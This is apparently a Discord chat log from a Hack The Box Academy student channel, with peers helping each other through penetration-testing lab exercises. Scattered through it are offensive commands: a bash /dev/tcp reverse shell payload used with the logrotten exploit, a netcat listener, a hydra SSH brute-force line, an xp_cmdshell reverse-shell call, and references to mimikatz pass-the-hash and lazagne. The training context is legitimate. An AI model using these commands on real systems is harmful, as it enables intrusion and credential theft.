and i used this exploit :https://github.com/whotwagner/logrotten/blob/master/logrotten.c

ayo tell me one thing am i suppose to use the ip of the vm or the vpn ?

?

it should be the ssh vm ip cuz thats what am using

I do not understand the question.
For the RevShell?
You have to take the IP of the VM from the VPN. Mostly interface tun0

HONEY IT'S STIL NOT GIVING ANY CONNECTION

*small latter's *

nc -nlvp 9001
Listening on 0.0.0.0 9001

Sweetie, your caps lock key is stuck 😉

ahahahhaa

@slender shoal basically it is the attack host, that is ssh’d into Ubuntu

#858470491676737536 your message here

What is in your payload file?

i compiled this :https://github.com/whotwagner/logrotten/blob/master/logrotten.c

oh

the payload

yes, the Payload

bash -i >& /dev/tcp/10.10.15.14/9001 0>&1

and the ip am using is the ip of the vpn

i feel like i should use a diffferent por

*port

The IP of your VM on the VPN interface, yes

The Port is fine

VPN interface,

and also

i missed this part because there was no file :logger@nix02:~$ grep "create|compress" /etc/logrotate.conf | grep -v "#"

The IP already looks right. I think you used the IP of your VM on the VPN interface (usually tun0).

??

In Skill assessment question:
SSH to 10.129.. with user "user2" and password ""

what is meaning of password ""

Q: If you search and find the name of this host, you will find the flag for user2.

I think, password = flag from user1

yes you are right! Thanks 🙂

@acoustic owl even after creating the file it removes by itself ?./logrotten -p ./payload ./backups/access.log
Waiting for rotating ./backups/access.log...
Renamed ./backups with ./backups2 and created symlink to /etc/bash_completion.d
Waiting 1 seconds before writing payload...
htb-student@ubuntu:~$ ls
backups backups2 logrotten payload super.c
htb-student@ubuntu:~$ ls
backups logrotten payload super.c

is this behaviour normal ? @acoustic owl @silent scarab

Yes, that is what happened to me too

User4 has a lot of files and folders in their Documents folder. The flag can be found within one of them.

I can able to list of all files but how can I check the content of the flag.

ugh it's getting on my nerves now

Ignore! got it! 🙂

Password Attack-medium lab I’m in ||jason||user and I need login with dennis credential I read document carefully but no idea 🤷‍♀️

In my mind I need to get id_rsa (for dennis ) to get privilege and log in as a root via ssh because all my skills to get privilege for jason doesn’t work … so i need to show any dir for dennis but I don’t have permission … dig more or Im in wrong rode ?

Hello everyone, I just went over the "Documentation & Reporting" module in prep for the CPTS. I was wondering about the logging of the shell output. I dont like tmux and I belong to the mad people that use like 5 different terminal windows with 4 tabs each all over the place. So far I only found script -a filename and tee -a filename for logging my stuff to be useful. Which do have some issues with the ohmyzsh and powerlevel10k theme, because of the autocomplete being shown in the logs with ^H everywhere. Does anyone have any other recommendations? I am using the xfce terminal, but I was thinking of using a 2nd terminal like terminator to have a black on white default profile for screenshots when raw output isn't really working out. Maybe there is a good ohmyzsh plugin?

nc -nlvp 9001
Listening on 0.0.0.0 9001
Connection received on 10.129.204.41 50942
root@ubuntu:~# ^C

i was about to have a connection

and got it

https://academy.hackthebox.com/module/147/section/1318

I use lazagne.exe to run in cmd,

when I start start lazagne.exe all it pop ups the lazagne, but after few seconds, it close automatically

how do I fix it?

open cmd
run this command
.\lazagne.exe all

Anyone can give me hints?

If I remember correctly Dennis can be bruteforced

Not entirely sure what password file it was though

anyone worked with Miscellaneous Techniques
Passive Traffic Capture

I made a brute force and I don’t have any login

hydra -l dennis -P mut_pass.list ssh://IP

Which module?

There might be a password file that you can find somewhere

Password attack-medium lab

See what services are running local on the server

I know ||Mysql|| and when login with all credentials I found nothing happened

hey buddies, sorry for asking a lot, but i finally figured it out, i just want to know why am i getting this error?? the path is fine!! edit:: i am at Attacking Common Services - Hard

and I reviewed Footprinting module … I think this is new idea I will learn it

Hmm? you are probably making a mistake here. Send me the command you are using via DM, then I'll have a look at it

Now I’m learning about how this server work my question is I’m in right road!

Thanks I’ll DM u

Sanity check please
Attacking common applications- Attacking Thick Client Applications
Trying to drag/drop the .bin file into de4dot exe ..
Iv set up so it runs in powershell fine, changed x64gdb settings and restarted it, followed memory map and tried all MAP + -RW-- type files
But it's always saying not .net framework on all exported .bins
Guidance of what I'm missing appreciated
Inboxes welcome

Is it because system should be capital S? Also, can't you just do dir C:\Windows.... without needing to chain commands

Edit: Never mind the capital S thing 😂

i didnt get it,i cant chain commands?

i just got the flag 😂 thanks

Nice... Did chaining commands work? I've never tried it the cmdshell to be honest

no it didnt, i think it consider the next comm part of the path

yes it does

In the Learning Process module's page about The Brain, it mentions two common myths about the brain, and right afterward it goes on to say:

One of the best-known examples is Einstein, who we know was terrible at math and learned very slowly throughout his school career, unlike the others.

But isn't that also a myth that has been disproven?

should i buy htb academy student pass or htb vip subscription which is better for a begginer

academy if you want to learn. Otherwise if you have knowledge how to attack boxes, go with VIP.

oh ok i think i have to go academy then thanks

one more question? does practicing htb help in real life scenarios

Academy is more realistic

ayo

i need help can someone help me ?

in stack based buffer overflow linux x86

can anybody help me ?

Real basic one, where is the password suppose to SSH in?
I have tried "" and no password and both do not work.

Module: INTRODUCTION TO WINDOWS COMMAND LINE

hey can you help me

in this question " How large can our shellcode theoretically become if we count NOPS and the shellcode size together? (Format: 00 Bytes)"

in stack based buffer over flow linux

password = Flag from user2

Anyone happen to knock out the Logrotate section on the Linux PE module? I noticed there isnt a /etc/logrotate.conf on the target

for DNS enumeration using python, DNS records & queries, first question asks "Investigate all records for the domain "inlanefreight.com" with the help of dig or nslookup and submit the one unique record in double quotes as the answer.", what does unique record mean?

i'm trying both dig and nslookup and I see nothing in double quotes...

thanks - was being an idiot

You need to find another way to find out when the logs are rotated. Have a look at the user directory

What exactly dig command did you send?

I tried just dig inlanefreight.com, then I tried the different record types i.e. dig A inlanefreight.com

but it's unclear what unique record it's referring to

Which records use quotation marks?

found it, kind of wish that was clearer what it wanted...

thank you!

Better if you ask the question

File transfer - windows

was playing around the "Windows File Transfer Methods" section of "FIle Transfer" module in the academy.

Using the WebDav Python module I created a WebDav share using

sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous

which was provided from this section.

Then I tried to connect to this share from the victim's windows powershell using

dir \<my-tun0-ip>\DavWWWRoot

command, which was provided from this section.

I keep getting a “network path was not found” error. Has anyone ran into this issue???

Can someone gives me a tip which wordlist to use for ftp attack in attacking common services

I used many inclusive wordlist from resources

Section Attacking FTP?

Yes

I mean to get the flag

I know the user already

Lists are available on the FTP server

Hey guys, looking for a little pointer for Linux Privilege Escalation Module for the final test, currently on flag 4

how do i find the file path for the .bashrc file

Do you know how to see hidden files on Linux?

no but i learned the find command, but no work

i tried

find -name .bashrc

What module are you doing?

linux fundamentals

Ls -la

That’s what shows hidden files within a directory

thx found it

Well -a would do it but I prefer la

You’re welcome 👍🏼

Hey, not sure if this is the best channel for this. But anyone know if there are more cloud focused modules in the pipeline? Things specific to what you might run into in the cloud labs (Cyclone, Blizzard, Hailstrom)?

Can someone tell me why we do not use /usr/bin/php 🤔 ?

Someone here can help me ? I have this message and I am disconnected of the server :
client_loop: send disconnect: Broken pipe

Because php is already in our user path

Yeah but how can I know I have to use /bin/sh???

I mean logically speaking: what is the shell

you would have to ask HTB Staff. We students do not know what HTB plans

Also if you use gtfo bins it's just doing the "I believe" and sending it

Thanks, yeah didn’t know if there were any staff in the discord channel.

What?

gtfobins is a compiled site with a bunch of different Linux binaries and how to escape them to root

Yes and?

Look in the user list under HTB Staff

Anyway the reason for /bin/sh is: it's the shell...

Like that's it

That's the only reason for it

Just because we use a shell?

Because you're using a bash shell, yes

:p you're telling php to pull it's commands from bash

Alright so when it's php we do this?

Technically speaking when you run that command you drop into a shell session within a php session

Yep

Well, thanks.

Btw I tried to do the knowledge test from getting started without msf but I did not found how to login in admin.

I found the password + username but nothing, it was not working :(.

I was trying to do like before in the Nibbles.

https://tenor.com/view/tandpetare1-tandpetare-gif-25009149

I attempted that, wasn't able to get anything working. Could just be me misconfiguring it, couldn't find anything in forums oin it either.

How can I set a link in obsidian?

am pasting this

https://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet#links

but it doesnt show as link

[[]]

Same thing

(not)

Btw I tried to do the knowledge test from getting started without msf but I did not found how to login in admin.
I found the password + username but nothing, it was not working :(.
I was trying to do like before in the Nibbles.

Password Attack - Hard lab What should be do when cracked password BitLocker file ||Backup.vdb|| ?

Mount this drive

SQLMap Module Skills Assessment. I've discovered the flag in the final_flag table but when I submit it comes back as incorrect. Can anyone DM me the flag to sanity check?

What type of SQL injection did you do? Blind?

hint there is grep filter command on that script remove that and you should see the flag is the script is sending ||post|| request beucase hint the flag isn't in a ||pdf file||

or you can modified the grep command a bit for it to filter the flag and the wget thing in the script will download the flag for you

Blind time based with a tamper script and no cast

yeah this is a known (for me) send me the flag for that and if it's wrong i'll send you the right flag

Hello,
Just wanna double check
So my account on Academy is not related to the HTB Labs account or?

Checking cuz of progress credit thing

you would need to re-run it a few times I guess

make sure to use --flush-sessions, to make sure you're actually re-running it

the flag for that have a typo and i got no idea how many time i saw this error get reported but i guess it's a features not a bug

Is there a general discussion channel here or?

No access?

if you are new here read #welcome and #rules after that use /verify at #bot-commands and you will get access to the other channels

as you may already know time based attacks sometimes can produce incorrect results

yea but (i think) as far as i can remember everyone i help with this issue have the flag with the same typo

in such cases, it would be better to explain the type of attack

and the margin of error

Can’t mount with this command dislocker -V file.vhd -u password — /root/bit_loker_decrypt

I think my password wrong ?

Attacking common applications- Attacking Thick Client Applications? stuck at using dnspy. the file isnt a .net pe file
i have no idea what im doing wrong. Ive tried and dumped everything i could

Can you check the md5 sum of the backup in box and on your host?

OMG it’s possible to change? I used evil-winrm to make it impossible change but Ill check now

also give this a try if you need help mounting that #modules message

Hey guys, looking for a little pointer for Linux Privilege Escalation Module for the final test, currently on flag 4

If my password is ||1******!|| should be worked ? Because I’m wating a lot of time with john to finish cracking but still working

How do i get started

Same

Hallo

Ill try tom solve

Mounting on windows is easier if you can’t get it done on Linux

I ended up mounting it on my windows host

Bruv anyone tell me how to get started

I'll try to learn a lot

first step don't spam and if you are new here read #welcome and #rules after that use /verify at #bot-commands and check /start-here also at #bot-commands

has anyone faced this issue using proxychains to connect rdp with other pc

||yep||

I could use nmap with proxychains, and it is fine, but the rdesktop....

Are you sure that’s the right ip?

Attacking common applications- Attacking Thick Client Applications? stuck at using dnspy. the file isnt a .net pe file
i have no idea what im doing wrong. Ive tried and dumped everything i could

thanks, I am fucked up...

no you just need some red bull

maybe burnt out

I used proxychains with rdp today

Requirements user password when write this command dislocker /dev/loop0p2 -u ||1””””!|| — /media/bitlocker

try without the space after -u so -u(password) like in my example

Ur amazing man

Thanks All to help me in this module I appreciate that 🌹

http://dontasktoask.com/ try to ask better question next time but from your previous post i'm guessing you already login via ||**sql|| and if you haven't got RCE then hint get RCE but if you already have a shell then you can just continue trying the previous exploits that you mentioned

great question and you got RCE in the mssqlclient shell right? hint just make something like a meterpreter shell and upload / run it

sure you can try something like hoaxshell there is no AV to bypass but i just use that tool because i can get a quick and stable powershell payload + rev shell

or you can use something like netcat.exe and you can just use the binary that come with kali (or parrot on the pwnbox) or the given foothold machine in your case

yep same with the meterperter rev shell if you used one

did you output the file into the C:\Windows\Temp\ directory?

also this is exactly what i use for this

first why? and just try the default temp directory this isn't a shared lab so you don't have to do this and also did confirm the directory has been maked?

but why would you need wo switch to that folder? if you have nc.exe at C:\Windows\Temp\ you can just use C:\Windows\Temp\nc.exe (rev shell tag) to get a shell

i must be doing something dumb. this seems easy. stuck on the "enumerating password policies section" where they are asking for the minpwdlength. i run crackmapexec smb command and i get a traceback error on my attack machine. i run that same command on the victim machine and get no output. i ran enum4linux on both machines with no output either. what am i doing wrong?

i mean if you have then you can just use that syntax to get a shell without needing to change directory and if you want to use nc.exe to get a shell you can just wget that binary from your box and output it there and get a shell

which module and section are you on?

active directory enumeration and attacks/enumerating and retrieving password policies

oh sorry about that but hint you can use example cme command the main thing is the last tag but those cred in the example will also work so you can just use that or you can use ldapsearch and the main tag is showed in the example

thanks

what are this names "MS01 , DC01 " in AD enumerate and attack Module? are this directories or subdomains or what?

So, i am currently studying "WINDOWS FUNDAMENTALS" module but i don't really know how to approach it.
Do i have to study and remember quite everything or just understanding it?
For example, should i learn all system main processes that run on windows or do i just have to know how processes work on windows?

what the hell is that? 🤣

when i use dupalgeddon where do i need to use the creds?

http://drupal-qa.inlanefreight.local/node?destination=node am trying to login here

and it says wrong credentials

just use something like

xp_cmdshell "C:\Windows\Temp\reverse.exe"```

Hoaxshell, from https://github.com/t3l3machus/hoaxshell

John hammond made a video on it

wait what? how is that hoaxshell??

I dunno

yeah i know i have been using the tool for a while now but i never saw that

Maybe there's a command that outputs that or smthn

99% of the time i use the tool it's just output a base64 encoded payload

i use the linux version and tbh i do that too (actually no, even on windows i b64 it)

if you base64 decode the payload for some reason just don't and try xp_cmdshell (hoaxshell payload)

Can someone help me connect to a VPN so I can get access to starting point?

Sure, whatchu need help with specifically?

read #welcome and #rules after that use /verify at #bot-commands and ask that at #starting-point

and did you see any request on your python server? because the error message is very clear about what the issue is

yeah give me a sec i'll double check this and send you a dm

Oh my, you guys have been working on this for a long time, huh @vital adder

I pray for your sanity

nah i got used to this

Alright, I am in the footprinting hard lab and have a few questions. When you run an nmap -p- IP it doesn't show any SNMP, yet if I run an snmpwalk, I get a bunch of info. Just wondering if normally I should see an SNMP port on nmap open before i attempt SNMP enumeration

yes I had the same problem. try using different wordlists

okay

the only issue is, when I give it the hash in hashcat it says it cant use it because its not valid

That's because SNMP is UDP

yup

so how would i fix that?

is that why?

Run a -sU scan it should show the port

dont worry about hashcat for now. the module hasnt gone over hashcat yet. I did the same thing. continue on msfconsole and play with some other wordlists.

alright

will do. wow I never run sU scans and for some reason I thought a -p- runs both U and T

it doesnt

No, -p- will scan all ports but it's a TCP scan

because a -p- -sU would take an eternity

well big win on learning something valuable today

I have a doubt, can anyone help me on how should i ping a maschin in academy?

udp scans take ages, so it's just not worth spamming it

learnt it from ippsec

wdym?

not able to ping the ip

so should I add it to my pentest methodology? Obviously I totally missed it. Wonder if an -sU with specific ports would be valuable

cause udp is a stateless protocol there's not a built in failure condition to know a port is open, and it could just be taking awhile for the service to respond, so udp scans take forever cause theres a delay in listening for a reply.

on top of that some services only respond if they receive proper data, so the only way to talk yo them and know theyre they is to throw a bunch of common services protocols at the port

so UDP takes forever

rip lol

I usually only scan for the most common of udp ports

thats what I need for sure

I don’t think we’re able to wget or curl things from attack host to target

what module is this?
What section of the module is this?
show your openvpn command output.

oh it's pwnbox

thats a public docker container, it wont respond to ping

yeah you'd just curl or ssh into it then

or web browser

depending on the section

also you should technically not reveal the ip and port when you're doing a docker container section cause someone else could mess with your lab if theyre being a dick

Next question. when it comes to braa. the SNMP enum tool, for some reason I don't understand the OID's that it uses. Here is a snip of some of the data from SNMPwalk. What of this is the OID?

iso.3.6.1.2.1.25.1.7.1.2.1.4.6.66.65.67.75.85.80 = ""
iso.3.6.1.2.1.25.1.7.1.2.1.5.6.66.65.67.75.85.80 = INTEGER: 5
iso.3.6.1.2.1.25.1.7.1.2.1.6.6.66.65.67.75.85.80 = INTEGER: 1
iso.3.6.1.2.1.25.1.7.1.2.1.7.6.66.65.67.75.85.80 = INTEGER: 1
iso.3.6.1.2.1.25.1.7.1.2.1.20.6.66.65.67.75.85.80 = INTEGER: 4
iso.3.6.1.2.1.25.1.7.1.2.1.21.6.66.65.67.75.85.80 = INTEGER: 1

#bot-commands

At least it often fails for me

for instance, a command I would run based on this would be:

braa backup@10.129.202.20:3.6.1
Unable to process queries: Invalid OID: '3.6.1'!

Hello everyone. I’m having some trouble in password module. I’m support find the contents of david.txt file. It supposed to be done by pass the hash. The has I have is correct. But how am I supposed to pass the hash using mimikatz. I’m not able to understand the syntax for it

https://blog.netwrix.com/2021/11/30/passing-the-hash-with-mimikatz/

dunno if this would help but I googled it and this is what I found. Might be worth a try to research some syntax

I’m performing the same thing mentioned here. I did it by sshing as administrator. Is it the mistake I’m doing. Am I supposed to perform it by RDPing into system ?

Haven't done that one yet. would say that is worth a try

I’ll give it a shot then

oh man. So i have gotten into the IMAP server with a user gained from SNMP. their inbox has nothing of value

hi!!!!!

i need a bit of help completing the environment enumeration chapter from the linux priv esc module

i've searched EVERYWHERE but I can't find anything

please @me if you're up to help, thanks!!!

https://dontasktoask.com

@fallow sun

o

sorry:(

Noobie question: The command to hide errors was 2>/dev/null?

is there any experts in linux privesc around? I'd like to get a hand in finding a hidden (either in plain sight or actually hidden) file containing a flag in the enumeration chapter of the linux privesc module in the htb academy. i'm really stuck rn and i've almost checked every file i've found. maybe i just dont know where to search:(

...maybe

lemme recheck

it should be that syntax

i did use the 2>/dev/null thingy

but i remember seeing that sometimes that can throw some output that actually does contain something funny

is there any places to learn about privilege escalation besides HTB for now? I can't afford the cubes right now since I want to do fundamentals instead.

read the link lol

you did the same thing again with your second question

la -la

sorry im kinda dumb ok i promise i will not do it again

dont need to apologize or promise anything to me

its a guide on how to ask better questions so YOU are more likely to get the help you actually need

just ask ur question xd

its legitimately a good read

if u give details of what u have to do and what u tried with the link better

ok sorry im just frustrated ok?

its all good, aint nobody mad here

except me

im always mad

https://chat.openai.com/